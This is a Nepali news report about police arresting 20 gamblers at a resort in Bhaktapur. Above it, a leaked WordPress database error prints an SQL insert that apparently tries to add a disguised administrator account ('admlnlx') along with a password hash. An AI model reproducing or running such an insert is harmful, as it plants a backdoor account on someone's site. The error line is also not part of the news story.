WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTsxm5lkJQPn2RJEERAWWV0m0C/8gH1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 12:25:37', '', 'admlnlx', 'admlnlx')
भक्तपुर,माघ ७ –
भक्तपुर नगरपालिका–२ कमलविनायक भत्केकोपाटीस्थित रातोभाले रिसोर्टबाट प्रहरीले आज २० जना जुवाडेलाई पक्राउ गरेको छ ।
महानगरीय प्रहरी कार्यालय रानीपोखरीबाट खटिएको प्रहरीको विशेष टोलीले जुवा खेलिरहेको अवस्थामा नगद रु सात लाख ५२ हजार ८५० र १६ थान कौडासहित उनीहरुलाई पक्राउ गरेको हो ।
प्रहरीले जुवा खेलाउने रिसोर्टका सञ्चालक काभ्रे दोलालघाट–८ का वर्ष २८ का कुमार खत्रीसहित २० जनालाई पक्राउ गरी महानगरीय प्रहरी परिसर भक्तपुरले थप अनुसन्धान सुरु गरेको छ ।
प्रहरी परिसर भक्तपुरका प्रवक्ता एवम् प्रहरी निरीक्षक दिलबहादुर सुवेदीका अनुसार पक्राउ परेकामध्ये दुईजना महिला जुवामा संलग्न नरहेको अनुसन्धानबाट पाइएपछि उनीहरुलाई छाडिएको बताउनुभयो ।
जुवा खेलाउने रिसोर्ट सञ्चालकसहित अन्य १८ जनालाई भने आजै मुद्दा चलाएको उहाँले जानकारी दिनुभयो । – रासस